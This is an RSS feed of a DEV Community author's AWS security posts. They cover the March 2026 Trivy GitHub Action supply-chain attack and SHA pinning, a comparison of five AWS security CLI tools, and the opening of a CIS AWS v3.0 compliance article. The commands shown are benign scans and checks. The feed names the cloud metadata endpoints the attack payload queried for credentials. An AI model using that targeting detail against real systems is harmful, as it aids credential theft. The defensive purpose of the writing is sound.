<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Mariusz Gębala</title>
    <description>The latest articles on DEV Community by Mariusz Gębala (@haitmg).</description>
    <link>https://dev.to/haitmg</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3798861%2F0f78162d-f1c3-4c7b-9cc3-9a58231a066c.png</url>
      <title>DEV Community: Mariusz Gębala</title>
      <link>https://dev.to/haitmg</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/haitmg"/>
    <language>en</language>
    <item>
      <title>12 Steps to Secure GitHub Actions After the Trivy Attack</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Wed, 15 Apr 2026 11:32:48 +0000</pubDate>
      <link>https://dev.to/haitmg/12-steps-to-secure-github-actions-after-the-trivy-attack-1l8h</link>
      <guid>https://dev.to/haitmg/12-steps-to-secure-github-actions-after-the-trivy-attack-1l8h</guid>
      <description>&lt;p&gt;In March 2026, attackers compromised Trivy - one of the most popular open-source vulnerability scanners - through its GitHub Action. They force-pushed 75 of 76 version tags to malicious commits. AWS credentials, GCP tokens, SSH keys - stolen from every workflow that ran the compromised action. Within five days, the attack cascaded to Docker Hub, VS Code extensions, and PyPI (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-33634" rel="noopener noreferrer"&gt;CVE-2026-33634&lt;/a&gt;, CVSS 9.4).&lt;/p&gt;

&lt;p&gt;Most teams heard about this in isolation. It wasn't isolated.&lt;/p&gt;

&lt;p&gt;I traced the full chain back 16 months - from a Personal Access Token accidentally committed in a SpotBugs workflow (November 2024), through the &lt;a href="https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-tj-actionschanged-files-cve-2025-30066-and-reviewdogaction" rel="noopener noreferrer"&gt;tj-actions/changed-files&lt;/a&gt; mass compromise targeting Coinbase (March 2025, CVE-2025-30066), the AI-augmented Nx/s1ngularity attack (August 2025), and the GhostAction campaign that stole 3,325 secrets from 817 repositories (September 2025) - all the way to the Trivy/TeamPCP attack and the concurrent prt-scan campaign using AI-generated payloads.&lt;/p&gt;

&lt;p&gt;The pattern is clear: &lt;strong&gt;the pipeline is not the target - your AWS account is.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Every one of these attacks specifically went after cloud credentials. The Trivy payload queried the AWS Instance Metadata Service at &lt;code&gt;169.254.169.254&lt;/code&gt; and the ECS task metadata endpoint at &lt;code&gt;169.254.170.2&lt;/code&gt;. It wasn't looking for GitHub tokens.&lt;/p&gt;

&lt;p&gt;SHA pinning would have stopped the Trivy attack. But SHA pinning is step 1 of 12.&lt;/p&gt;
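
&lt;p&gt;As a rough sketch of what pinning involves (not taken from the full article): resolve the tag you currently reference to its commit SHA, then use that SHA instead of the tag in the workflow's &lt;code&gt;uses:&lt;/code&gt; line. The repository URL and the &lt;code&gt;TAG&lt;/code&gt; value below are placeholders for whichever action and release you actually use.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Placeholders: substitute the action repository and the tag you reference today
ACTION_REPO="https://github.com/aquasecurity/trivy-action"
TAG="vX.Y.Z"

# List the remote tags and keep the entries for this tag.
# For annotated tags, the line ending in ^{} carries the commit SHA to pin.
git ls-remote --tags "$ACTION_REPO" | grep -F "refs/tags/$TAG"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;A tag can be force-pushed to a different commit, which is what happened here. A full 40-character commit SHA cannot be repointed, so the workflow keeps running the code that was reviewed.&lt;/p&gt;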

&lt;p&gt;In the full article, I cover:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;A complete timeline&lt;/strong&gt; of CI/CD supply chain attacks from November 2024 to March 2026&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;12 concrete hardening steps&lt;/strong&gt; with copy-paste YAML and Terraform code - from SHA pinning and OIDC setup to egress monitoring with StepSecurity Harden-Runner&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;A prevention matrix&lt;/strong&gt; showing which step would have stopped which attack&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What GitHub is building next&lt;/strong&gt; - the 2026 Actions Security Roadmap (dependency locking, native egress firewall, immutable actions)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://haitmg.pl/blog/github-actions-security-after-trivy-attack/" rel="noopener noreferrer"&gt;Read the full article with all 12 steps, code examples, and sources&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://haitmg.pl/blog/github-actions-security-after-trivy-attack/" rel="noopener noreferrer"&gt;haitmg.pl&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>github</category>
      <category>aws</category>
      <category>security</category>
      <category>devops</category>
    </item>
    <item>
      <title>5 Open-Source AWS Security CLI Tools Worth Trying in 2026</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Wed, 01 Apr 2026 20:41:15 +0000</pubDate>
      <link>https://dev.to/haitmg/5-open-source-aws-security-cli-tools-worth-trying-in-2026-med</link>
      <guid>https://dev.to/haitmg/5-open-source-aws-security-cli-tools-worth-trying-in-2026-med</guid>
      <description>&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;No single security tool covers everything, even today. &lt;a href="https://github.com/prowler-cloud/prowler" rel="noopener noreferrer"&gt;Prowler&lt;/a&gt; has a ton of checks. &lt;a href="https://github.com/aquasecurity/trivy" rel="noopener noreferrer"&gt;Trivy&lt;/a&gt; is the best-known tool for containers and cloud. &lt;a href="https://github.com/BishopFox/cloudfox" rel="noopener noreferrer"&gt;CloudFox&lt;/a&gt; is built for pentesters. &lt;a href="https://github.com/DenizParlak/heimdall" rel="noopener noreferrer"&gt;Heimdall&lt;/a&gt; focuses on IAM privilege escalation. &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit&lt;/a&gt; correlates findings into attack chains and provides fixes you can apply via Terraform or the AWS CLI.&lt;/p&gt;

&lt;p&gt;There's something for everyone - what matters is choosing the one that fits how you work.&lt;/p&gt;




&lt;h2&gt;
  
  
  The landscape
&lt;/h2&gt;

&lt;p&gt;Have you ever wished for a tool that could do everything for us? You know, literally everything. We'd wake up in the morning to an automatically generated list on our laptop: "Do this project today, use this AI agent, then post it here and there - it will bring you success, fame, and money." However, I now believe that even the most refined LLM won't replace creativity and real human needs.&lt;/p&gt;

&lt;p&gt;The same goes for security scanning in AWS: it isn't as straightforward as it seems. Start with one question - do you know what you want to check, and what you'll do with the results in the report?&lt;/p&gt;

&lt;p&gt;Some tools optimize for breadth, running 500+ rules across multiple clouds. Others optimize for depth, covering a smaller area in much greater detail. Still others try to balance the two. Is it possible to create a perfect tool that is free of noise and precisely meets the requirements of every administrator? In my opinion, no.&lt;/p&gt;

&lt;p&gt;In this article, I'd like to present five CLI tools that I've personally tested, so I hope to provide an unbiased opinion on them (all as of April 2, 2026). If you want a deeper dive into how Prowler and ScoutSuite stack up against cloud-audit, I wrote a &lt;a href="https://haitmg.pl/blog/aws-security-scanners-compared/" rel="noopener noreferrer"&gt;detailed comparison on my blog&lt;/a&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Prowler
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Stars:&lt;/strong&gt; over 13k | &lt;strong&gt;Checks:&lt;/strong&gt; &amp;gt;550 (AWS) | &lt;strong&gt;Language:&lt;/strong&gt; Python&lt;br&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/prowler-cloud/prowler" rel="noopener noreferrer"&gt;prowler-cloud/prowler&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Install:&lt;/strong&gt; &lt;code&gt;pip install prowler&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Anyone responsible for securing AWS (or other clouds) is likely familiar with Prowler. It's by far the most popular open-source scanner, with 572 AWS checks across 84 services and 41 compliance standards (CIS, SOC 2, HIPAA, PCI-DSS, NIST 800-53, and many more). When auditors start asking "Are you using Prowler?", you know how widely it has been adopted.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Advantages:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The widest compliance framework coverage of any OSS tool&lt;/li&gt;
&lt;li&gt;Multi-cloud: AWS, Azure, GCP, Kubernetes, and others&lt;/li&gt;
&lt;li&gt;Active development, large community, commercial support&lt;/li&gt;
&lt;li&gt;HTML, CSV, JSON-OCSF, SARIF output&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Where it falls short:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Scan time: 10-30 minutes on a standard account (572 checks take time)&lt;/li&gt;
&lt;li&gt;Attack path detection exists, but requires Prowler App (self-hosted Docker Compose + Neo4j + Cartography) or the paid SaaS. The standard Prowler CLI only reports individual findings&lt;/li&gt;
&lt;li&gt;Remediation comes as text hints, not copy-and-paste commands&lt;/li&gt;
&lt;li&gt;The output of 572 checks can be overwhelming - you need to know which findings are relevant&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt; Compliance-focused teams that need to check the box for CIS/SOC 2/HIPAA/PCI-DSS.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;prowler
prowler aws
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  2. Trivy
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Stars:&lt;/strong&gt; &amp;gt; 34k | &lt;strong&gt;AWS Checks:&lt;/strong&gt; ~350-450 | &lt;strong&gt;Language:&lt;/strong&gt; Go&lt;br&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/aquasecurity/trivy" rel="noopener noreferrer"&gt;aquasecurity/trivy&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Install:&lt;/strong&gt; &lt;code&gt;brew install trivy&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This is an interesting case. Trivy was initially designed for container vulnerability scanning, but later expanded to include cloud misconfiguration scanning. Its key differentiator is a single binary that covers everything - container images, IaC files (Terraform, CloudFormation), Kubernetes, SBOM, licenses, and live AWS accounts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it does well:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A single binary covers containers + IaC + cloud + secrets + SBOM&lt;/li&gt;
&lt;li&gt;Fast, Go-based&lt;/li&gt;
&lt;li&gt;Huge community (34k stars)&lt;/li&gt;
&lt;li&gt;CycloneDX and SPDX output for supply chain&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Where it falls short:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;AWS cloud scanning seems secondary to container scanning&lt;/li&gt;
&lt;li&gt;No attack chain detection - no correlation between findings&lt;/li&gt;
&lt;li&gt;Links to documentation pages for fixes, no CLI/Terraform output&lt;/li&gt;
&lt;li&gt;AWS CIS compliance limited to versions 1.2 and 1.4 (not 3.0)&lt;/li&gt;
&lt;li&gt;The March 2026 supply chain attack (Trivy's GitHub Action was compromised for about 12 hours) raised trust issues&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt; Teams that already use Trivy for containers and want a single tool for everything.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;trivy aws &lt;span class="nt"&gt;--region&lt;/span&gt; eu-central-1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  3. CloudFox
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Stars:&lt;/strong&gt; &amp;gt;2300 | &lt;strong&gt;Commands:&lt;/strong&gt; 24 AWS enumeration modules | &lt;strong&gt;Language:&lt;/strong&gt; Go&lt;br&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/BishopFox/cloudfox" rel="noopener noreferrer"&gt;BishopFox/cloudfox&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Install:&lt;/strong&gt; &lt;code&gt;brew install cloudfox&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Here we're dealing with a slightly different type of tool. This isn't a typical scanner; it's a reconnaissance tool for cloud penetration testers. It enumerates what an attacker with a given set of credentials can actually do - which roles to assume, which secrets to read, which instances to reach.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it excels at:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An attacker's perspective, not a defender's checklist&lt;/li&gt;
&lt;li&gt;Enumeration across accounts and services&lt;/li&gt;
&lt;li&gt;Generates "loot files" - ready-to-use commands that an attacker could run&lt;/li&gt;
&lt;li&gt;Good for red teams and penetration testers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Where it falls short:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No checks, no rules, no findings - just raw enumeration data&lt;/li&gt;
&lt;li&gt;No suggestions for remediation or fixes&lt;/li&gt;
&lt;li&gt;No compliance framework&lt;/li&gt;
&lt;li&gt;No HTML/PDF reports - just table and CSV output&lt;/li&gt;
&lt;li&gt;Requires manual analysis to connect facts to attack paths&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt; Penetration testers and red teams assessing what can actually be accessed with a given set of permissions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cloudfox aws &lt;span class="nt"&gt;--profile&lt;/span&gt; target-account all-checks
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  4. Heimdall
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Stars:&lt;/strong&gt; &amp;gt;140 | &lt;strong&gt;Patterns:&lt;/strong&gt; &amp;gt;50 IAM escalations, &amp;gt;85 attack chains | &lt;strong&gt;Language:&lt;/strong&gt; Python&lt;br&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/DenizParlak/heimdall" rel="noopener noreferrer"&gt;DenizParlak/heimdall&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Install:&lt;/strong&gt; from source (&lt;code&gt;pip install -e .&lt;/code&gt;)&lt;/p&gt;

&lt;p&gt;Heimdall focuses primarily on IAM privilege escalation. It checks whether a user with limited privileges could end up as an administrator, even unintentionally. It maps trust relationships between IAM roles, policies, and services to find multi-hop escalation paths (A assumes B, B has PassRole on C, C is an administrator).&lt;/p&gt;
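
&lt;p&gt;To make a single hop of such a path concrete, here is a manual spot check using the standard AWS CLI policy simulator. It is only a sketch and not how Heimdall works internally; the account ID and role name are hypothetical.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Hypothetical principal to test; replace with a real role or user ARN
PRINCIPAL_ARN="arn:aws:iam::123456789012:role/example-limited-role"

# Ask the IAM policy simulator whether this principal is allowed the two
# actions that typically link one hop of an escalation path to the next
aws iam simulate-principal-policy \
  --policy-source-arn "$PRINCIPAL_ARN" \
  --action-names sts:AssumeRole iam:PassRole \
  --query "EvaluationResults[].[EvalActionName,EvalDecision]" \
  --output table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;An &lt;code&gt;allowed&lt;/code&gt; decision marks a candidate hop, nothing more. Run this way, the simulator evaluates only the principal's identity-based policies against all resources, so the target role's trust policy still has to be checked separately - which is exactly the tedious part a multi-hop tool automates.&lt;/p&gt;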

&lt;p&gt;&lt;strong&gt;What it does well:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Focuses on a difficult problem (privilege escalation) that most scanners miss&lt;/li&gt;
&lt;li&gt;Over 85 attack chain patterns with MITRE ATT&amp;amp;CK mapping&lt;/li&gt;
&lt;li&gt;Multi-hop detection (not just direct admin access)&lt;/li&gt;
&lt;li&gt;Interactive terminal user interface&lt;/li&gt;
&lt;li&gt;Ability to scan Terraform before deployment&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Where it falls short:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Last commit: December 2025 (may no longer be actively maintained)&lt;/li&gt;
&lt;li&gt;No one-step pip install - you have to clone the repository and install from source&lt;/li&gt;
&lt;li&gt;No compliance frameworks (CIS, SOC 2, etc.)&lt;/li&gt;
&lt;li&gt;No remediation commands&lt;/li&gt;
&lt;li&gt;Small community (146 stars, 4 commits)&lt;/li&gt;
&lt;li&gt;AWS only&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt; IAM-focused security reviews where the question "who can become an admin?" needs to be answered.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/DenizParlak/heimdall
&lt;span class="nb"&gt;cd &lt;/span&gt;heimdall &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt;
heimdall scan
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  5. cloud-audit
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Stars:&lt;/strong&gt; &amp;gt;30 | &lt;strong&gt;Checks:&lt;/strong&gt; 80 | &lt;strong&gt;Language:&lt;/strong&gt; Python&lt;br&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;gebalamariusz/cloud-audit&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Install:&lt;/strong&gt; &lt;code&gt;pip install cloud-audit&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;Website:&lt;/strong&gt; &lt;a href="https://haitmg.pl/cloud-audit/" rel="noopener noreferrer"&gt;haitmg.pl/cloud-audit&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I created this tool. I tried to gather everything I needed most for my work. I kept running the same AWS security reviews and was missing one tool that would truly streamline them, hence the idea. I needed a scanner that would show how findings connect to actual attack paths, not just a flat list.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it does well:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;20 attack chain rules that correlate findings (e.g., public SG + IMDSv1 + admin role = account takeover path)&lt;/li&gt;
&lt;li&gt;Each finding includes AWS CLI + Terraform remediation code, not just descriptions&lt;/li&gt;
&lt;li&gt;Compliance with AWS CIS v3.0 (62 checks) and SOC 2 Type II (43 criteria) with evidence for each check&lt;/li&gt;
&lt;li&gt;Breach cost estimation per finding and attack chain (sources cited: IBM, Verizon DBIR)&lt;/li&gt;
&lt;li&gt;Scan diff to track drift between runs&lt;/li&gt;
&lt;li&gt;MCP server for AI agent integration (Claude, Cursor)&lt;/li&gt;
&lt;li&gt;Under 60 seconds on a standard account&lt;/li&gt;
&lt;/ul&gt;
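
&lt;p&gt;To illustrate the kind of signals the example chain correlates, two of its three ingredients can be listed by hand with the AWS CLI. This is only a sketch of the raw inputs, not cloud-audit's implementation.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Instances that still accept IMDSv1 (session tokens are optional)
aws ec2 describe-instances \
  --filters Name=metadata-options.http-tokens,Values=optional \
  --query "Reservations[].Instances[].InstanceId" \
  --output text

# Security groups with at least one inbound rule open to 0.0.0.0/0
aws ec2 describe-security-groups \
  --filters Name=ip-permission.cidr,Values=0.0.0.0/0 \
  --query "SecurityGroups[].GroupId" \
  --output text
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Neither list is alarming on its own. The chain matters when the same instance shows up in both and its instance profile carries admin rights.&lt;/p&gt;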

&lt;p&gt;&lt;strong&gt;Where it falls short:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;80 checks compared to 572 in Prowler - smaller coverage&lt;/li&gt;
&lt;li&gt;AWS only, no multi-cloud&lt;/li&gt;
&lt;li&gt;Small community (31 stars)&lt;/li&gt;
&lt;li&gt;Newer and less battle-tested&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt; Teams that need fewer, high-signal findings with attack context and ready-to-paste fixes.&lt;/p&gt;

&lt;p&gt;If you want to see it in action, here's a &lt;a href="https://www.youtube.com/watch?v=G6xvLcAh71M" rel="noopener noreferrer"&gt;4-minute walkthrough on YouTube&lt;/a&gt; where I scan a real AWS account and find 3 attack chains.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;cloud-audit
cloud-audit scan &lt;span class="nt"&gt;-R&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Side-by-side comparison
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Prowler&lt;/th&gt;
&lt;th&gt;Trivy&lt;/th&gt;
&lt;th&gt;CloudFox&lt;/th&gt;
&lt;th&gt;Heimdall&lt;/th&gt;
&lt;th&gt;cloud-audit&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AWS checks&lt;/td&gt;
&lt;td&gt;572&lt;/td&gt;
&lt;td&gt;~400&lt;/td&gt;
&lt;td&gt;24 commands&lt;/td&gt;
&lt;td&gt;50+ patterns&lt;/td&gt;
&lt;td&gt;80&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Attack chains&lt;/td&gt;
&lt;td&gt;App only&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (85+)&lt;/td&gt;
&lt;td&gt;Yes (20)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remediation&lt;/td&gt;
&lt;td&gt;Text&lt;/td&gt;
&lt;td&gt;Doc links&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;CLI + Terraform&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compliance&lt;/td&gt;
&lt;td&gt;41 frameworks&lt;/td&gt;
&lt;td&gt;CIS 1.2/1.4&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;MITRE only&lt;/td&gt;
&lt;td&gt;CIS v3.0, SOC 2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-cloud&lt;/td&gt;
&lt;td&gt;Yes (12+)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (3)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scan time&lt;/td&gt;
&lt;td&gt;10-30 min&lt;/td&gt;
&lt;td&gt;2-5 min&lt;/td&gt;
&lt;td&gt;1-3 min&lt;/td&gt;
&lt;td&gt;1-2 min&lt;/td&gt;
&lt;td&gt;&amp;lt;60 sec&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Output&lt;/td&gt;
&lt;td&gt;HTML, CSV, SARIF, JSON&lt;/td&gt;
&lt;td&gt;Table, SARIF, SPDX&lt;/td&gt;
&lt;td&gt;Table, CSV, JSON&lt;/td&gt;
&lt;td&gt;SARIF, CSV, JSON&lt;/td&gt;
&lt;td&gt;HTML, SARIF, JSON, MD&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cost estimation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  What I would actually use
&lt;/h2&gt;

&lt;p&gt;For a compliance audit: &lt;strong&gt;Prowler&lt;/strong&gt;. Nothing else comes close on framework coverage.&lt;/p&gt;

&lt;p&gt;For a pentest: &lt;strong&gt;CloudFox&lt;/strong&gt;. It thinks like an attacker.&lt;/p&gt;

&lt;p&gt;For container + cloud in one pipeline: &lt;strong&gt;Trivy&lt;/strong&gt;. Single binary, single CI step.&lt;/p&gt;

&lt;p&gt;For a quick "what can an attacker actually do with my account": &lt;strong&gt;cloud-audit&lt;/strong&gt; or &lt;strong&gt;Heimdall&lt;/strong&gt;. Depends on whether you want IAM escalation depth (Heimdall) or broader attack chains with fixes (cloud-audit).&lt;/p&gt;

&lt;p&gt;There is no reason to pick just one. I run Prowler for compliance evidence and cloud-audit for the attack chain context and fix code. They complement each other.&lt;/p&gt;

&lt;p&gt;If you're looking for a more detailed breakdown of how these tools compare on specific AWS security checks, I covered that in my &lt;a href="https://haitmg.pl/blog/aws-security-scanners-compared/" rel="noopener noreferrer"&gt;AWS Security Scanners Compared&lt;/a&gt; article. And if you're setting up security scanning in CI/CD, check out the &lt;a href="https://haitmg.pl/blog/aws-security-audit-checklist/" rel="noopener noreferrer"&gt;AWS Security Audit Checklist&lt;/a&gt; for a step-by-step approach.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Tools and star counts verified as of April 2026. Check each project's GitHub for the latest.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>opensource</category>
      <category>devops</category>
    </item>
    <item>
      <title>CIS AWS v3.0 in 60 Seconds: Automate Compliance with Terraform</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Fri, 27 Mar 2026 11:00:21 +0000</pubDate>
      <link>https://dev.to/haitmg/cis-aws-v30-in-60-seconds-automate-compliance-with-terraform-54d3</link>
      <guid>https://dev.to/haitmg/cis-aws-v30-in-60-seconds-automate-compliance-with-terraform-54d3</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; I've built a compliance engine into &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit&lt;/a&gt; that maps 62 CIS AWS v3.0 controls to automated checks with per-control Terraform remediation. Run &lt;code&gt;cloud-audit scan --compliance cis_aws_v3&lt;/code&gt; to get the results. The HTML report shows which controls passed and which failed, and provides Terraform code snippets for quick fixes. 55 of the 62 controls are fully automated. Disclosure: I am the author of cloud-audit.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is the CIS AWS Foundations Benchmark?
&lt;/h2&gt;

&lt;p&gt;The &lt;a href="https://www.cisecurity.org/benchmark/amazon_web_services" rel="noopener noreferrer"&gt;CIS Amazon Web Services Foundations Benchmark&lt;/a&gt; is a set of security configuration recommendations published by the Center for Internet Security. Version 3.0.0 includes 62 recommendations that define the baseline security posture every AWS account should meet. It is arguably the most frequently cited AWS security standard, is often used during audits, and is commonly referenced as evidence for compliance programs such as ISO 27001, SOC 2, and BSI C5.&lt;/p&gt;

&lt;h2&gt;
  
  
  The problem with CIS compliance today
&lt;/h2&gt;

&lt;p&gt;Are you preparing for your first audit? Or have you already been through one? In practice, you open a 200-page PDF and just want to pass the certification audit. You have to manually review every control, click through the AWS console from left to right and top to bottom, run a multitude of CLI commands (not everything is easily accessible from the console), and finally record all your observations in Excel. Sounds like a "very interesting" job, right? With 62 controls, you can safely assume it will cost you 2-3 days.&lt;/p&gt;

&lt;p&gt;Then the audit arrives. The auditor asks, "Show me the evidence for control 3.4." You think, "Here we go. I had that in screenshot number 248." Either you have a brilliant memory, or it will take you another few days to dig up all the evidence for the auditor.&lt;/p&gt;

&lt;p&gt;As you've probably guessed, I'm not the first person to think this should be automated. &lt;a href="https://docs.aws.amazon.com/securityhub/latest/userguide/cis-aws-foundations-benchmark.html" rel="noopener noreferrer"&gt;AWS Security Hub&lt;/a&gt; maps 37 controls. &lt;a href="https://github.com/prowler-cloud/prowler" rel="noopener noreferrer"&gt;Prowler&lt;/a&gt; maps all of them. However, neither answers the question of how to fix the failures (at least not with copy-paste code).&lt;/p&gt;

&lt;p&gt;I've been through my share of security audits, including ones involving AWS. That experience is what pushed me to automate this process as fully as possible.&lt;/p&gt;

&lt;h2&gt;
  
  
  What CIS AWS v3.0 actually requires
&lt;/h2&gt;

&lt;p&gt;The CIS AWS Foundations Benchmark v3.0.0 has 62 recommendations across 5 sections:&lt;/p&gt;

